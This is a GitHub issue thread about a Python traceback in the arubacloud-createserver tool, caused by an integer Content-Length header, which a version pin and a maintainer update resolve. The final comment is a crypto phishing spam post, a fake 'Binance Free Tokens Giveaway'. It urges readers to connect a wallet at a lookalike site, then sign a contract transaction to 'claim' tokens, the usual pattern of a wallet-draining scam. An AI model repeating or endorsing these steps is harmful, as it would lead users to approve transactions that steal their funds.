### ISSUE TITLE
must be of type str or bytes, not <type 'int'>

### ISSUE THREAD

**Issue by 7c** [Valian/arubacloud-createserver#1]
Hi,
thanks for this great product, i have been using it but since recenlty it has stopped working. I am getting

`Logging to ArubaCloud DC4
Creating SmartVm test1...
DEBUG: request data
{u'ApplicationId': u'SetEnqueueServerCreation',
 u'Password': u'******!i',
 u'RequestId': u'SetEnqueueServerCreation',
 u'Server': {u'AdministratorPassword': u'*******',
             u'Name': u'test1',
             u'Note': u'Create by pyArubaCloud',
             u'OSTemplateId': 618,
             u'SmartVMWarePackageID': 2},
 u'Username': u'FCZ-xxxx'}
Traceback (most recent call last):
  File "/srv/entrypoint.py", line 74, in <module>
    cli()
  File "/usr/local/lib/python2.7/site-packages/click/core.py", line 722, in __call__
    return self.main(*args, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/click/core.py", line 697, in main
    rv = self.invoke(ctx)
  File "/usr/local/lib/python2.7/site-packages/click/core.py", line 1066, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
  File "/usr/local/lib/python2.7/site-packages/click/core.py", line 895, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "/usr/local/lib/python2.7/site-packages/click/core.py", line 535, in invoke
    return callback(*args, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/click/decorators.py", line 17, in new_func
    return f(get_current_context(), *args, **kwargs)
  File "/srv/entrypoint.py", line 57, in create_server
    if not c.commit(url=ci.wcf_baseurl, debug=debug):
  File "/usr/local/lib/python2.7/site-packages/ArubaCloud/objects/__init__.py", line 22, in commit
    response = Http.post(url=url, data=self.get_json(), headers=headers)
  File "/usr/local/lib/python2.7/site-packages/ArubaCloud/helper/__init__.py", line 31, in post
    response = requests.post(url, data=data, json=json, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/api.py", line 112, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 494, in request
    prep = self.prepare_request(req)
  File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 437, in prepare_request
    hooks=merge_hooks(request.hooks, self.hooks),
  File "/usr/local/lib/python2.7/site-packages/requests/models.py", line 306, in prepare
    self.prepare_headers(headers)
  File "/usr/local/lib/python2.7/site-packages/requests/models.py", line 440, in prepare_headers
    check_header_validity(header)
  File "/usr/local/lib/python2.7/site-packages/requests/utils.py", line 872, in check_header_validity
    "bytes, not %s" % (name, value, type(value)))
requests.exceptions.InvalidHeader: Value for header {Content-Length: 290} must be of type str or bytes, not <type 'int'>`

I have tried the Docker version and also on seperate Ubuntu14 with Python 2.7 version on it. both commands throw similar exception with type.

**Comment by 7c** [comment]
i have put pyArubaCloud==0.7.2 inside requirements.txt which solved the problem. Do you mind to update the repo?

**Comment by Valian** [comment]
@taskinosman thank you for the report. I've updated version to 0.7.6 in 446caa8b42032471200451f271f9d1461a515162, but since I'm not using arubacloud anymore I have no easy way to test if it's working. Can you check and write here if everything is fine?

**Comment by IT-Immanent** [comment]
# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

<a href="https://www.bnbrewards.online/?source=github" target="_blank">
  <img src="https://i.imgur.com/1yUfzqb.png" alt="Binance Free Tokens" width="400px" height="450px">
</a>


## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - 
2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰
